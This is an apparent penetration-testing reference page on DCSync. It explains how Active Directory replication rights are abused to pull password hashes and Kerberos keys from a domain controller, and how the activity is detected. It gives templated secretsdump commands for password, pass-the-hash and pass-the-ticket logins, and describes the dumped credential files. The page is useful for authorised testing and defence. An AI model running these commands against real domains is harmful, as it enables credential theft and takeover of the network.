DCSync

How to find sensitive data using a DCSync.

Overview

A DCSync yields the same secrets as dumping and parsing NTDS.dit. However, rather than copying the database off the domain controller, DCSync abuses the Directory Replication Service Remote Protocol (MS-DRSR): the attacker impersonates a domain controller and asks a real DC, through the DRSGetNCChanges call, to replicate the account objects, which include the password hashes and Kerberos keys. Nothing is written to disk on the DC and no file is transferred, so the traffic looks like ordinary replication unless the source of the replication request is checked.

To perform a DCSync you need either a domain administrator account or any principal that has been granted both of the following extended rights on the domain naming context: DS-Replication-Get-Changes (Replicating Directory Changes) and DS-Replication-Get-Changes-All (Replicating Directory Changes All). By default these are held by Domain Admins, Enterprise Admins, Administrators and the domain controller computer accounts, so a compromised DC machine account or a misconfigured ACL on the domain object is enough. Auditing which principals hold these two rights is the corresponding defensive check, and a replication request (Windows event 4662 carrying the GUIDs of those rights, 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) from a host that is not a domain controller is the detection.

Remotely performing a DCSync

The easiest way to perform a DCSync remotely is Impacket's secretsdump.py (packaged as impacket-secretsdump on Kali).

secretsdump.py supports several techniques for dumping password hashes and secrets. Against a domain controller the NTDS part is done over DRSUAPI, i.e. a DCSync; the -just-dc flag (or -just-dc-ntlm for NTLM hashes only) restricts it to that so that nothing else, such as the remote registry, is touched on the DC.

DCSync using a plaintext password

secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>

DCSync using Pass-the-Hash

The LM half may be left empty (-hashes :<NThash>); only the NT hash is needed.

secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>

DCSync using Pass-the-Ticket

Point KRB5CCNAME at the ccache holding the ticket, add -no-pass so secretsdump does not prompt for a password, and use the domain controller's FQDN rather than its IP so that the Kerberos service ticket matches.

secretsdump -k -no-pass -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>

secretsdump output

With -outputfile 'data', secretsdump writes the following files. The first three are the DCSync result; the last two come from the DC's remote registry, are only produced when the account is also a local administrator on the DC, and are skipped with -just-dc:

  • data.ntds

    • LM and NT password hashes, one account per line in the form domain\user:rid:lmhash:nthash:::. The NT hashes are what hash cracking (hashcat -m 1000) and Pass-the-Hash use; an LM hash of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, and an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 is an empty password.

  • data.ntds.cleartext

    • Passwords of accounts stored using reversible encryption, in the form domain\user:CLEARTEXT:password.

  • data.ntds.kerberos

    • Kerberos keys (DES, AES128 and AES256) in the form domain\user:etype:hexkey; the AES keys can be used directly for Kerberos authentication and ticket forging without cracking.

  • data.sam

    • Domain controller's local SAM hashes

  • data.secrets

    • Domain controller's LSA secrets (machine account password, service account passwords, DPAPI_SYSTEM keys)
